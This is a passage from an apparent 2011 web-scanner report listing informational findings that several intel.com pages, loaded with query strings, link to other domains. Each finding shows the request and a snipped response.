INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42928

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.112. http://www.intel.com/itcenter/system/server/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/system/server/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/system/server/index.htm?iid=subhdr+itc_server
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/system/server/index.htm?iid=subhdr+itc_server HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41858

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.113. http://www.intel.com/itcenter/system/transactional/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/system/transactional/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/system/transactional/index.htm?iid=subhdr+itc_transactdev
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/system/transactional/index.htm?iid=subhdr+itc_transactdev HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41364

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.114. http://www.intel.com/itcenter/system/workstation/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/system/workstation/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/system/workstation/index.htm?iid=subhdr+itc_workstation
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/system/workstation/index.htm?iid=subhdr+itc_workstation HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40517

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.115. http://www.intel.com/itcenter/tool/vpro/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/tool/vpro/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/tool/vpro/index.htm?iid=subhdr+itc_vpro
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/tool/vpro/index.htm?iid=subhdr+itc_vpro HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45819

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.116. http://www.intel.com/itcenter/topics/cloud/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/topics/cloud/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/topics/cloud/index.htm?iid=gg_work+home_cloud
The response contains the following links to other domains:
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.opendatacenteralliance.org/

Request

GET /itcenter/topics/cloud/index.htm?iid=gg_work+home_cloud HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46228

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<p>As a technical advisor to the <a href="http://www.opendatacenteralliance.org" title="Open Data Center Alliance">Open Data Center Alliance</a>
...[SNIP]...
</p>
<a href="http://www.opendatacenteralliance.org" title="Open Data Center Alliance" target="_blank" >Sign up now &gt;</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.117. http://www.intel.com/itcenter/topics/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/topics/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/topics/index.htm?iid=subhdr+itc_alltopics
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/topics/index.htm?iid=subhdr+itc_alltopics HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47102

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en">
<h
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.118. http://www.intel.com/itcenter/topics/performance/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/topics/performance/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/topics/performance/index.htm?iid=subhdr+itc_performance
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/topics/performance/index.htm?iid=subhdr+itc_performance HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56407

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.119. http://www.intel.com/itcenter/topics/savings/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/topics/savings/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/topics/savings/index.htm?iid=subhdr+itc_savings
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/topics/savings/index.htm?iid=subhdr+itc_savings HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44352

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
